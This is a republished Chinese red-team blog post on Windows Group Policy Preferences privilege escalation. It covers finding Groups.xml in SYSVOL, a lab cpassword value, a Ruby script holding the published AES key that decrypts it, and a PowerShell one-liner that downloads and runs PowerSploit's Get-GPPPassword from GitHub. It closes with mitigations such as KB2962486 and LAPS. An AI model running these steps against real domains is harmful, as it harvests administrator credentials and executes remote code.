碼上快樂

相關內容    簡體    繁體

關於windows組策略首選項提權

本文轉載自   查看原文   2020-03-14 15:08   611    紅隊/ 內網/ 技巧/ 內網滲透

sysvol是活動目錄的一個用於存儲公共文件服務器副本的共享文件夾,在域中的所有域控之間進行復制。sysvol文件夾是在安裝活動目錄時候自動創建的,主要用來存放登錄腳本、組策略數據及其他域控需要的域信息。sysvol在所有經過身份驗證的域用戶或者域信任用戶具有讀權限的活動目錄的域范圍內共享。整個sysvol目錄在所有的域控中是自動同步和共享的,所有組策略在:C:\Windows\SYSVOL\domain\Policies中

 在一般域環境中所有機器都是腳本化批量部署的,數據量很大,為了方便對所有機器進行操作。網管會使用域策略進行統一的配置和管理,大多數組織在創建域環境后會要求加入域的計算機使用域用戶密碼進行登錄驗證。為了保證本地管理員的安全性,這些組織的網絡管理員往往會修改本地管理員面

通過組策略修改密碼,若攻擊者獲得一台機器的本地管理員密碼,就相當於獲取整個域中所有機器的本地管理員密碼。

域控的組策略中新建yangyang組策略

 進入編輯

如下進行新建

將域中每個計算機的本地administrator用戶更名為 admin,並且設置新的密碼Aa123456

確定后添加domain computers

更新組策略

管理員在域中新建一個組策略后,操作系統會自動在SYSVO共享目錄中生成一個XML文件,該文件中保存了該組策略更新后的密碼。該密碼使用AES-256加密算法,安全性還是比較高的。但是,2012年微軟在官方網站上公布了該密碼的私鑰,導致保存在XML文件中的密碼的安全性大大降低。任何域用戶和域信任的用戶均可對該共享目錄進行訪問,這就意味着,任何用戶都可以訪問保存在XML文件中的密碼並將其解密,從而控制域中所有使用該賬號、密碼的本地管理員計算機。可通過在SYSVOL中搜索,可以找到Groups.xml文件。

通過詳細信息中的唯一id定位

 

最終找到如下:
C:\Windows\SYSVOL\domain\Policies\{8C4C36A7-7BA1-4F33-B2F5-9ADD814299F3}\Machine\Preferences\Groups

密碼:6IsqRFD6k9q5fWvZZPGGyAK9njRNN76NKTrLAfsvHGk

使用msf獲取組策略密碼如下:

腳本解密如下:
require 'rubygems'
require 'openssl'
require 'base64'
encrypted_data = "6IsqRFD6k9q5fWvZZPGGyAK9njRNN76NKTrLAfsvHGk"
def decrypt(encrypted_data)
    padding = "=" * (4 - (encrypted_data.length % 4))
      epassword = "#{encrypted_data}#{padding}"
        decoded = Base64.decode64(epassword)
           key = "\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b"
             aes = OpenSSL::Cipher::Cipher.new("AES-256-CBC")
               aes.decrypt
                 aes.key = key
                   plaintext = aes.update(decoded)
                     plaintext << aes.final
                       pass = plaintext.unpack('v*').pack('C*') # UNICODE conversion
                         return pass
                          end
blah = decrypt(encrypted_data)
puts blah

kali直接利用:

powershell腳本:
powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1');Get-GPPPassword"
Import-Module .\Get-GPPPassword.ps1;Get-GPPPassword


防御措施:
在用於管理組策略的計算機上安裝 KB2962486補丁,防止新的憑據被放置在組策略首選項中。微軟在2014年修復了組策略首選項提權漏洞,使用的方法就是不再將密碼保存在組策略首選項中。

此外,針對Everyone訪問權限進行設置,具體如下:
設置共享文件夾SYSVOL的訪問權限
將包含組策略密碼的 XML 文件從 SYSVOL 目錄中刪除
不要把密碼放在所有域用戶都有權訪問的文件中
如果需要更改域中機器的本地管理員密碼,建議使用LAPS



 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 組策略首選項 獲取AD域中SYSVOL和組策略首選項中的密碼 vscode 插件安裝以及首選項配置 詳解Android首選項框架ListPreference VSCode插件和首選項配置 如何重置Photoshop首選項?ps重置首選項的方法 Android學習筆記(十四)方便實用的首選項-PreferenceActivity 【ubuntu】首選項和應用程序命令(preference & application) 應用程序首選項(application preference)及數據存儲 Xamarin.Android學習之應用程序首選項
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM